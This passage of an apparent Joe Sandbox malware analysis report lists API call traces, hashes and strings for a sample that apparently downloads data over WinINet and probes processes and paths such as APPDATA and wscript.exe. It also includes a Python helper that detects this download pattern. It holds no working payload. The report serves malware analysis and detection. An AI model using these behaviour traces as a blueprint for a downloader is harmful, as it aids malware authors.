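    then reads from it (in that order); otherwise return None."""
    def first(*names):
        return next((i for i, c in enumerate(calls) if c.name in names), None)

    i_open = first("InternetOpenA", "InternetOpenW")
    i_url = first("InternetOpenUrlA", "InternetOpenUrlW")
    i_read = first("InternetReadFile")
    if None in (i_open, i_url, i_read) or not (i_open < i_url < i_read):
        return None
    reads = [c for c in calls if c.name == "InternetReadFile"]
    chunk_sizes = {c.args[2] for c in reads if len(c.args) > 2 and c.args[2] is not None}
    open_call, url_call = calls[i_open], calls[i_url]
    return {
        "access_type": ACCESS_TYPES.get(open_call.args[1], f"0x{open_call.args[1]:X}"),
        "url_flags": decode_flags(url_call.args[4]),
        "read_chunk_sizes": sorted(chunk_sizes),
        "read_calls": len(reads),
        "close_calls": sum(c.name == "InternetCloseHandle" for c in calls),
        "caches_response": not (url_call.args[4] & 0x04000000),  # NO_CACHE_WRITE absent
    }


# Constructed from the call list in the report above (same arguments and ref addresses).
SAMPLE_TRACE = """
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D2BA1
• InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 005D2C1D
• InternetCloseHandle.WININET(00000000), ref: 005D2C2A
• InternetCloseHandle.WININET(00000000), ref: 005D2C98
• InternetCloseHandle.WININET(00000000), ref: 005D2C9B
• InternetReadFile.WININET(00000000,?,00002000,?), ref: 005D2CC7
• InternetReadFile.WININET(00000000,?,00002000,?), ref: 005D2CFE
• InternetCloseHandle.WININET(00000000), ref: 005D2D52
• InternetCloseHandle.WININET(00000000), ref: 005D2D55
"""

if __name__ == "__main__":
    result = find_download_loop(parse_trace(SAMPLE_TRACE))
    for key, value in (result or {}).items():
        print(f"{key}: {value}")
```

Unknown bits are echoed as raw hex rather than dropped, so a flag the table does not name is still visible in the output; a trace that reads before it opens a URL, or never opens a session, is not reported as a download loop. The InternetCloseHandle at 005D2C2A sitting between the URL open and the first read is consistent with an early-exit path after a failed InternetOpenUrlA, which the list order (sorted by call-site address) alone cannot confirm.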
Strings
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$FileOpenRead
                                                                                                                                                                                            • String ID: ""~|fP$,`$33333333$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$sHM
                                                                                                                                                                                            • API String ID: 3539267403-3594769453
                                                                                                                                                                                            • Opcode ID: e2bf7b570ddc9e190470bc3d3569ad3c1d56c9736f6bb3db25050d12cfc15689
                                                                                                                                                                                            • Instruction ID: 766394d180cfdcb8adf6d5b0175fe8a1ed16be23ff6bca1e5957dab0a8db06b6
                                                                                                                                                                                            • Opcode Fuzzy Hash: e2bf7b570ddc9e190470bc3d3569ad3c1d56c9736f6bb3db25050d12cfc15689
                                                                                                                                                                                            • Instruction Fuzzy Hash: 20B11631D102189BDB12DB78DC45BEAB7B9BF69340F10876BF904B6251FB71AAC18B40
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005DBFE5
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005DC000
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC020
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC071
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 005DC167
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC17F
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DC18D
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DC192
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DC197
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Concurrency::cancel_current_taskLockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: N#^$N#^$d`$false$true
                                                                                                                                                                                            • API String ID: 1941589060-2412832227
                                                                                                                                                                                            • Opcode ID: f39d072459c109fd48bd7fd7d6a021e4a74d0c0f213105ecb24b640043a7f64f
                                                                                                                                                                                            • Instruction ID: c7e8452a5c742d1f25f95bdbf54aca56fd825fdf109205728e439b2f93e6bd2f
                                                                                                                                                                                            • Opcode Fuzzy Hash: f39d072459c109fd48bd7fd7d6a021e4a74d0c0f213105ecb24b640043a7f64f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8251C330A01316DBDB38DFA9D845A9ABFA1BF54310F14456FE8499B352DB32ED02CB81
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?), ref: 005D13DD
                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?), ref: 005D13FB
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?), ref: 005D1405
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000,00000000,?,00000104,?,?), ref: 005D144A
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 005D1455
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 005D175F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$Process$CurrentFileModuleNameOpen
                                                                                                                                                                                            • String ID: APPDATA$C:\ProgramData$C:\Windows\Microsoft.NET$LOCALAPPDATA$USERPROFILE$wscript.exe
                                                                                                                                                                                            • API String ID: 1772831937-2916873119
                                                                                                                                                                                            • Opcode ID: aaf6ec065320693acf5d4d68661c6f775d8631a681c40bdc7b6ac7002b8f50c8
                                                                                                                                                                                            • Instruction ID: 8b065620b875830a42b8f2a934c3c538d17cc22a4cfa7b539332e788910df140
                                                                                                                                                                                            • Opcode Fuzzy Hash: aaf6ec065320693acf5d4d68661c6f775d8631a681c40bdc7b6ac7002b8f50c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91B13432E00604ABDB20DAACDC84BBEBB79FB80350F58416BE816A7392D735DD45C758
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00606A6C
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605CF1
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D03
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D15
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D27
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D39
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D4B
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D5D
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D6F
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D81
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D93
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605DA5
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605DB7
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605DC9
                                                                                                                                                                                            • _free.LIBCMT ref: 00606A61
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 00606A83
                                                                                                                                                                                            • _free.LIBCMT ref: 00606A98
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AA3
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AC5
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AD8
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AE6
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AF1
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B29
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B30
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B4D
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B65
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                            • Opcode ID: 5684e3363b821f4c2387fff85a1d201a080251b22b62368c6555c73e391b364e
                                                                                                                                                                                            • Instruction ID: 5554644f40472c17cd5b37d45bae2f4d9e91133e88e1613e6bef4b82b64f886d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5684e3363b821f4c2387fff85a1d201a080251b22b62368c6555c73e391b364e
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA318F716803099FEB25AB38EA49BA77BEAFF40350F148429F254D7291DB75BC60C720
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
• Opcode ID: 0ff42c91669c732288d2766aafec07dad9ab6c7fcd8cbf8cf330ceb0118a4b39
• Instruction ID: 927f8a268ac0f40c8252696df65722edf57b47f3c71f35f1a0e723ae0a80cbaa
• Opcode Fuzzy Hash: 0ff42c91669c732288d2766aafec07dad9ab6c7fcd8cbf8cf330ceb0118a4b39
• Instruction Fuzzy Hash: 27C16672E80209ABDB64DB98CD46FEF7BF9AF08700F144164FA05EB2C2D6709A418B54
APIs
• IsInExceptionSpec.LIBVCRUNTIME ref: 005F3DC5
• type_info::operator==.LIBVCRUNTIME ref: 005F3DE7
• ___TypeMatch.LIBVCRUNTIME ref: 005F3EF6
• IsInExceptionSpec.LIBVCRUNTIME ref: 005F3FC8
• _UnwindNestedFrames.LIBCMT ref: 005F404C
• CallUnexpected.LIBVCRUNTIME ref: 005F4067
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2123188842-393685449
• Opcode ID: 58ad7360eabc5ad2ac3c07b15c8c09769f38ab97a7eb713b4e317201fe7b063d
• Instruction ID: 464f99b92c551330e567d38eca35104fdc4f7fab4e087accfbd6f57e3368fc15
• Opcode Fuzzy Hash: 58ad7360eabc5ad2ac3c07b15c8c09769f38ab97a7eb713b4e317201fe7b063d
• Instruction Fuzzy Hash: 10B1687180020EAFDF28DFA4C8859BEBFB9BF44310B14455AEA05AB212D779DA51CF91
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D56F1
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 005D575B
• InternetCloseHandle.WININET(00000000), ref: 005D5768
• InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D57C9
• InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D57FB
• InternetCloseHandle.WININET(00000000), ref: 005D580C
• InternetCloseHandle.WININET(00000000), ref: 005D580F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Internet$CloseHandle$FileOpenRead
• String ID: Couldn't open Internet!$Couldn't open URL!
• API String ID: 3539267403-1021515825
• Opcode ID: 1c814ec05a765f173e566c12441a3fdc821e287f2bea4107e7fa8c890ea6ee02
• Instruction ID: 2c483ea425b69a1bf88a75ed0e1507750b7af6d9c336398742c1a85a897bad71
• Opcode Fuzzy Hash: 1c814ec05a765f173e566c12441a3fdc821e287f2bea4107e7fa8c890ea6ee02
• Instruction Fuzzy Hash: E9519471A10209ABDB149FA8CC49BAFBB79FF44305F20451AF900B6381E7759A44CBA0
APIs
• _free.LIBCMT ref: 005FC98E
  • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
  • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
• _free.LIBCMT ref: 005FC99A
• _free.LIBCMT ref: 005FC9A5
• _free.LIBCMT ref: 005FC9B0
• _free.LIBCMT ref: 005FC9BB
• _free.LIBCMT ref: 005FC9C6
• _free.LIBCMT ref: 005FC9D1
• _free.LIBCMT ref: 005FC9DC
• _free.LIBCMT ref: 005FC9E7
• _free.LIBCMT ref: 005FC9F5
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 3d4e82929c39b13c76fa35f0a48b96c8307167210cc6be5679283eedf6e766ef
• Instruction ID: 772e3407770ac51c995529b2fa013966e9c3538a02ad3fef669d7d39e7a5e175
• Opcode Fuzzy Hash: 3d4e82929c39b13c76fa35f0a48b96c8307167210cc6be5679283eedf6e766ef
• Instruction Fuzzy Hash: 7821D67690010DAFCB02EF94CA85CEE7FB9BF48340F4081A6B7059B521DB35EA55CB80
APIs
• std::locale::_Init.LIBCPMT ref: 005DC4D7
  • Part of subcall function 005EF760: std::_Lockit::_Lockit.LIBCPMT ref: 005EF772
  • Part of subcall function 005EF760: std::locale::_Setgloballocale.LIBCPMT ref: 005EF78D
  • Part of subcall function 005EF760: _Yarn.LIBCPMT ref: 005EF7A3
  • Part of subcall function 005EF760: std::_Lockit::~_Lockit.LIBCPMT ref: 005EF7E3
• std::_Lockit::_Lockit.LIBCPMT ref: 005DC4EC
• std::_Lockit::_Lockit.LIBCPMT ref: 005DC507
• std::_Lockit::~_Lockit.LIBCPMT ref: 005DC527
• __Getcoll.LIBCPMT ref: 005DC5AA
• std::_Facet_Register.LIBCPMT ref: 005DC5DC
• std::_Lockit::~_Lockit.LIBCPMT ref: 005DC5F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Facet_GetcollInitRegisterSetgloballocaleYarn
• String ID: ios_base::badbit set
• API String ID: 1067193257-3882152299
• Opcode ID: e11b113ad60a65d71a4cb6d5e6ed451ad797ecb24a626599b89aff4f23eee695
• Instruction ID: be0aa30ec18d0daf9538370c6206ccf1fa2b4fb05e50b13847700ee412afd1f9
• Opcode Fuzzy Hash: e11b113ad60a65d71a4cb6d5e6ed451ad797ecb24a626599b89aff4f23eee695
• Instruction Fuzzy Hash: AA41B0719016169FDB34DF68E8449AEBFB5BF80310B15816BE8466B352DB31FA01CB80
APIs
• _ValidateLocalCookies.LIBCMT ref: 005F3797
• ___except_validate_context_record.LIBVCRUNTIME ref: 005F379F
• _ValidateLocalCookies.LIBCMT ref: 005F3828
• __IsNonwritableInCurrentImage.LIBCMT ref: 005F3853
• _ValidateLocalCookies.LIBCMT ref: 005F38A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: @0]$O&_$csm
• API String ID: 1170836740-2804530593
• Opcode ID: 6a705ab401249287b8739e95d017c6c6436c00a150b446a0d6ab118ab42bb71b
• Instruction ID: 31c15777ac586f5161b2bdadf79e83594e61dd3a23e64fa8e70859f6850bed93
• Opcode Fuzzy Hash: 6a705ab401249287b8739e95d017c6c6436c00a150b446a0d6ab118ab42bb71b
• Instruction Fuzzy Hash: FD41E174A0120D9BDF10DF68C884AAEBFA5FF44354F148595F918AB392C779EB41CB90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 005D1B92
• std::_Lockit::_Lockit.LIBCPMT ref: 005D1BAD
• std::_Lockit::~_Lockit.LIBCPMT ref: 005D1BCD
• std::_Lockit::~_Lockit.LIBCPMT ref: 005D1C1E
• __Getctype.LIBCPMT ref: 005D1C6D
• std::_Facet_Register.LIBCPMT ref: 005D1C93
• std::_Lockit::~_Lockit.LIBCPMT ref: 005D1CAB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
                                                                                                                                                                                            • String ID: d`
                                                                                                                                                                                            • API String ID: 2525760861-4132929406
                                                                                                                                                                                            • Opcode ID: c2935f2d3267341dd03542cb9329870afc293749da91f22ef772b70df20aec35
                                                                                                                                                                                            • Instruction ID: 2cafabf48987faa42869be6c2705ac546b95d16b98ae7bfc31a5c68a24521da5
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2935f2d3267341dd03542cb9329870afc293749da91f22ef772b70df20aec35
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441D771A40A15AFD734DF5CD8849A9BBB5FF50310B1481ABE8899B322EB31ED41C7C5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 16f84fc7c648c6b84828cb56d1747476c6686fd7119e42a44e4bf3386eb1edd8
                                                                                                                                                                                            • Instruction ID: d1201e64c0b6e0f2180df848b339f41e8db31370d05984c028c97b65a9b6e0a4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16f84fc7c648c6b84828cb56d1747476c6686fd7119e42a44e4bf3386eb1edd8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 65C10270E0420EAFDB25DF98D994BBE7FB1BF49300F144169EB04AB692C7789901CB60
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: d551e36c26060e5d1f5bce36b51f2292d64424321368591d52a6783737d3da62
                                                                                                                                                                                            • Instruction ID: c231611c0f46e0ee586d8c7f627d57a4e4490da64aa2f84589d5a11850cda8f7
                                                                                                                                                                                            • Opcode Fuzzy Hash: d551e36c26060e5d1f5bce36b51f2292d64424321368591d52a6783737d3da62
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1061D372980305AFDB28DF64C941BABBBEAEF44310F145529FA55AB2C1E770AD118B90
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB3A4
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB3BD
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB3FB
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB404
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB410
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorLast
                                                                                                                                                                                            • String ID: @0]$C
                                                                                                                                                                                            • API String ID: 3291180501-346233754
                                                                                                                                                                                            • Opcode ID: 43bd0a96790ddb44d9ba92b1a215c178132ed0d331390e56cd96d47825b50dea
                                                                                                                                                                                            • Instruction ID: b572b32d4ce01ce3fdcc854a85a09762246ff5bf286dfaa7a6ddcdee01363974
                                                                                                                                                                                            • Opcode Fuzzy Hash: 43bd0a96790ddb44d9ba92b1a215c178132ed0d331390e56cd96d47825b50dea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89B15D7590121ADFEB24DF18C888BADBBB5FF48304F5445A9EA49A7391D734AE90CF40
